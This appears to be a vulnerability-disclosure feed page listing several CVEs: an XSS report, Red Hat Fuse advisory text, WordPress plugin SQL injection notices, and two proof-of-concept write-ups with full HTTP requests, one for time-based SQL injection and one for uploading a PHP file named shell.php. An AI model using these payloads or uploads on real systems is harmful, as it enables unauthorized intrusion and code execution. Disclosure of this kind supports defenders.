A cross-site scripting (XSS) vulnerability in Sanitization Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter at /php-sms/classes/Login.php.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Sanitization Management

\> System v1.0.0 allows attackers to execute arbitrary web scripts or HTML

\> via a crafted payload injected into the username parameter at

\> /php-sms/classes/Login.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Sanitization Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> username

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-45214.

CVE-2022-45214: CVE/CVE-2022-45214.txt at main · Rajeshwar40/CVE

Poultry Farm Management System v1.0 contains a SQL injection vulnerability via the del parameter at /Redcock-Farm/farm/category.php.

**Poultry Farm Management System v1.0 by Nikhil\_B has SQL injection**

BUG\_Author: TavenLi

vendors:https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html

Vulnerability File: /Redcock-Farm/farm/category.php

GET parameter 'del' exists SQL injection vulnerability

Payload1: /Redcock-Farm/farm/category.php?del=a'

    GET /Redcock-Farm/farm/category.php?del=a' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An error page

Payload2: /Redcock-Farm/farm/category.php?del=a''

    GET /Redcock-Farm/farm/category.php?del=a'' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

An right page

Payload3: /Redcock-Farm/farm/category.php?del=a'%2b(select\*from(select(sleep(20)))a)%2b'

    GET /Redcock-Farm/farm/category.php?del=a'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    

The server response time is 20 seconds

CVE-2022-44399: bug_report/SQLi-1.md at main · tavenli/bug_report

Online Tours & Travels Management System v1.0 contains an arbitrary file upload vulnerability via /tour/admin/file.php.

Permalink

Cannot retrieve contributors at this time

**Online Tours & Travels management system v1.0 by mayuri\_k has arbitrary file upload**

BUG\_Author: lcg22266

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

Vulnerability url: ip/tour/admin/file.php

Loophole location: Online Tours & Travels management system's /admin/file.php file exists arbitrary file upload

Request package for file upload:

    POST /tour/admin/file.php HTTP/1.1
    Host: localhost
    Content-Length: 320
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryX5YWsfY9nqxrRgu9
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/tour/admin/file.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Connection: close
    
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9
    Content-Disposition: form-data; name="file"; filename="shell.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9
    Content-Disposition: form-data; name="submit"
    
    Upload Image
    ------WebKitFormBoundaryX5YWsfY9nqxrRgu9--
    

The files will be uploaded to this directory tour\\admin\\upload

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-44401: bug_report/RCE-1.md at main · lcg-22266/bug_report

A minor version update (from 7.11 to 7.11.1) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2019-8331: bootstrap: XSS in the tooltip or popover data-template attribute
* CVE-2021-3717: wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users
* CVE-2021-31684: json-smart: Denial of Service in JSONParserByteArray function
* CVE-2021-44906: minimist: prototype pollution
* CVE-2022-0613: urijs: Authorization Bypass Through User-Controlled Key
* CVE-2022-2048: http2-server: Invalid HTTP/2 requests cause DoS
* CVE-2022-2053: undertow: Large AJP request may cause DoS
* CVE-2022-24723: urijs: Leading white space bypasses protocol validation
* CVE-2022-24785: Moment.js: Path traversal  in moment.locale
* CVE-2022-24823: netty: world readable temporary file containing sensitive data
* CVE-2022-25857: snakeyaml: Denial of Service due to missing nested depth limitation for collections
* CVE-2022-31129: moment: inefficient parsing algorithm resulting in DoS
* CVE-2022-31197: postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names
* CVE-2022-33980: apache-commons-configuration: Apache Commons Configuration insecure interpolation defaults
* CVE-2022-38749: snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode
* CVE-2022-41853: hsqldb: Untrusted input may lead to RCE attack
* CVE-2022-42889: apache-commons-text: variable interpolation RCE


Issued:

2022-11-28

Updated:

2022-11-28

**RHSA-2022:8652 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Red Hat Fuse 7.11.1 release and security update

**Type/Severity**

Security Advisory: Important

**Topic**

A minor version update (from 7.11 to 7.11.1) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References.  

Security Fix(es):  

*   hsqldb: Untrusted input may lead to RCE attack \[fuse-7\] (CVE-2022-41853)
*   io.hawt-hawtio-online: bootstrap: XSS in the tooltip or popover data-template attribute \[fuse-7\] (CVE-2019-8331)
*   io.hawt-project: bootstrap: XSS in the tooltip or popover data-template attribute \[fuse-7\] (CVE-2019-8331)
*   wildfly: incorrect JBOSS\_LOCAL\_USER challenge location may lead to giving access to all the local users \[fuse-7\] (CVE-2021-3717)
*   json-smart: Denial of Service in JSONParserByteArray function \[fuse-7\] (CVE-2021-31684)
*   io.hawt-hawtio-integration: minimist: prototype pollution \[fuse-7\] (CVE-2021-44906)
*   urijs: Authorization Bypass Through User-Controlled Key \[fuse-7\] (CVE-2022-0613)
*   http2-server: Invalid HTTP/2 requests cause DoS \[fuse-7\] (CVE-2022-2048)
*   snakeyaml: Denial of Service due to missing nested depth limitation for collections \[fuse-7\] (CVE-2022-25857)
*   urijs: Leading white space bypasses protocol validation \[fuse-7\] (CVE-2022-24723)
*   Moment.js: Path traversal in moment.locale \[fuse-7\] (CVE-2022-24785)
*   netty: world readable temporary file containing sensitive data \[fuse-7\] (CVE-2022-24823)
*   jdbc-postgresql: postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names \[fuse-7\] (CVE-2022-31197)
*   commons-configuration2: apache-commons-configuration: Apache Commons Configuration insecure interpolation defaults \[fuse-7\] (CVE-2022-33980)
*   commons-text: apache-commons-text: variable interpolation RCE \[fuse-7\] (CVE-2022-42889)
*   undertow: Large AJP request may cause DoS \[fuse-7\] (CVE-2022-2053)
*   moment: inefficient parsing algorithm resulting in DoS \[fuse-7\] (CVE-2022-31129)
*   snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode \[fuse-7\] (CVE-2022-38749)

For more details about the security issues, including the impact, CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Fuse 1 x86\_64

**Fixes**

*   BZ - 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute
*   BZ - 1991305 - CVE-2021-3717 wildfly: incorrect JBOSS\_LOCAL\_USER challenge location may lead to giving access to all the local users
*   BZ - 2055496 - CVE-2022-0613 urijs: Authorization Bypass Through User-Controlled Key
*   BZ - 2062370 - CVE-2022-24723 urijs: Leading white space bypasses protocol validation
*   BZ - 2066009 - CVE-2021-44906 minimist: prototype pollution
*   BZ - 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale
*   BZ - 2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data
*   BZ - 2095862 - CVE-2022-2053 undertow: Large AJP request may cause DoS
*   BZ - 2102695 - CVE-2021-31684 json-smart: Denial of Service in JSONParserByteArray function
*   BZ - 2105067 - CVE-2022-33980 apache-commons-configuration: Apache Commons Configuration insecure interpolation defaults
*   BZ - 2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS
*   BZ - 2116952 - CVE-2022-2048 http2-server: Invalid HTTP/2 requests cause DoS
*   BZ - 2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections
*   BZ - 2129428 - CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names
*   BZ - 2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode
*   BZ - 2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE
*   BZ - 2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack

**CVEs**

*   CVE-2019-8331
*   CVE-2021-3717
*   CVE-2021-31684
*   CVE-2021-44906
*   CVE-2022-0613
*   CVE-2022-2048
*   CVE-2022-2053
*   CVE-2022-24723
*   CVE-2022-24785
*   CVE-2022-24823
*   CVE-2022-25857
*   CVE-2022-31129
*   CVE-2022-31197
*   CVE-2022-33980
*   CVE-2022-38749
*   CVE-2022-41853
*   CVE-2022-42889

**Red Hat Fuse 1**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:8652: Red Hat Security Advisory: Red Hat Fuse 7.11.1 release and security update

The OWM Weather WordPress plugin before 5.6.9 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as contributor

CVE-2022-3769

The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author

CVE-2022-3768

The HTML Forms WordPress plugin before 1.3.25 does not properly properly escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users

CVE-2022-3689

The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin

Tag

#sql